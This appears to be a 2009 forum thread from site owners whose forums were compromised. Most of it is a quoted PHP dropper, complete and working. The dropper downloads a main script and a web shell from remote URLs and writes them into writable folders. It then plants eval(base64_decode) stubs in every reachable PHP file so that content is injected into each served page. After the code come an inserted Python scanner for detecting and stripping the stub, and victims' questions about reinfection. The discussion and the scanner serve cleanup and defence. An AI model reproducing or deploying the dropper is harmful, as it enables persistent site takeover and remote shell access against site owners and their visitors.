if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

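The dropper above writes a one-line `<?php /**/eval(base64_decode('...')); ?>` stub into the PHP files it can reach, and its own `dgrself()` "restores" a file by dropping every line that contains `eval(base64_decode`. As an added example (not code from this thread or from SMF), here is a Python scanner for a site owner cleaning up: it walks a tree the way `fddir()` does, flags PHP files carrying that stub or a `cnf` file carrying the dropper's `ZGd1aA==` line, decodes the stub to confirm the payload's `ob_start('dgobh')` hook, and returns a copy with only the stub removed. Every marker string is taken from the decoded code above; the sample file is constructed.

```python
import base64
import re
from pathlib import Path

# Markers taken from the decoded dropper: the one-line stub it writes into PHP
# files, names used by the decoded payload, and the line it strips from 'cnf'.
STUB_RE = re.compile(
    r"<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>")
PAYLOAD_MARKERS = ("$GLOBALS['sh_no']", "ob_start('dgobh')", "function dgobh(", "gml()")
CNF_MARKER = "ZGd1aA=="
PHP_EXTENSIONS = {".php", ".phtml", ".php3"}  # the extensions fddir() looks for

def inspect_php_source(src: str) -> dict:
    """Find the eval(base64_decode) stub in one file's text, decode its payload,
    and return a cleaned copy with only the stub removed."""
    m = STUB_RE.search(src)
    if not m:
        return {"infected": False, "markers": [], "cleaned": src}
    try:
        decoded = base64.b64decode(m.group(1)).decode("latin-1")
    except ValueError:
        decoded = ""  # stub present but payload unreadable: still report it
    markers = [k for k in PAYLOAD_MARKERS if k in decoded]
    # Remove just the stub rather than the whole line as dgrself() does: the
    # stub is written without a trailing newline, so a whole-line delete could
    # also eat the file's own opening <?php tag if the two share a line.
    return {"infected": True, "markers": markers, "cleaned": STUB_RE.sub("", src, count=1)}

def scan_tree(root: str) -> dict:
    """Walk root like fddir() and map each suspicious path to its indicators."""
    hits = {}
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        text = p.read_text(errors="replace")
        if p.suffix.lower() in PHP_EXTENSIONS:
            r = inspect_php_source(text)
            if r["infected"]:
                hits[str(p)] = r["markers"]
        elif p.name == "cnf" and CNF_MARKER in text:
            hits[str(p)] = ["dropper cnf marker"]
    return hits

# Constructed sample: a harmless stand-in payload wrapped exactly as the dropper
# wraps its real one, prepended to the start of a forum PHP file.
SAMPLE_PAYLOAD = "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){ob_start('dgobh');}"
SAMPLE_STUB = ("<?php /**/eval(base64_decode('"
               + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "')); ?>")
SAMPLE_FILE = SAMPLE_STUB + "<?php\n// original forum file body\necho 'hello';\n"
```

Run `scan_tree()` against a copy of the web root and review the reported paths before overwriting anything with the `cleaned` text.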

Quote from: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.


Very informative post, thanx all.

I am running 1.1.8, and after having problems with user Avatars displaying, it didn't take long to be led to this post identifying "Krisbarteo" which I found was a user on my site.

I have banned/deleted the account, however many of my member avatars are still not working. So I am assuming my site must still be affected by that account's attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where I should be looking so that I can attempt to remove them? Or could I have not been attacked (even though he was a member) and my avatar problem caused by something else? Although I find it unlikely because the problems did begin shortly after he was a member.

Thanx.


cowdude

You guys are big help and I appreciate all you are doing.

I want to ask a very specific question.  Once everything is clean, which I have done 3 or 4 times and I did just KRISBARTEO, it has popped back up.  My questions are:

1.  Is the code the "64 Base" crap with a long "string of number" behind it or is that the result of the code that I have missed so far?

2.  Is the code only appearing in .php files or should I be scouring others as well, i.e. htaccess files?

Thanks again.

Cowdude
Left or right meet me at THE WATER COOLER to discuss your political views.

DirtRider

Anyone thought of contacting the ISP at all  :D

"CSS GROUP" Ltd.
Caunas street 7A-26, Cesis, LV-4101

Phone: +371 67 404544
Fax: +371 67 414545

E-mail addresses

Common questions:

Technical support:

Financial department:

Device rent and colocation:

SPAM report:
http://www.triumphtalk.com

"The real question is not whether machines think but whether men do. "
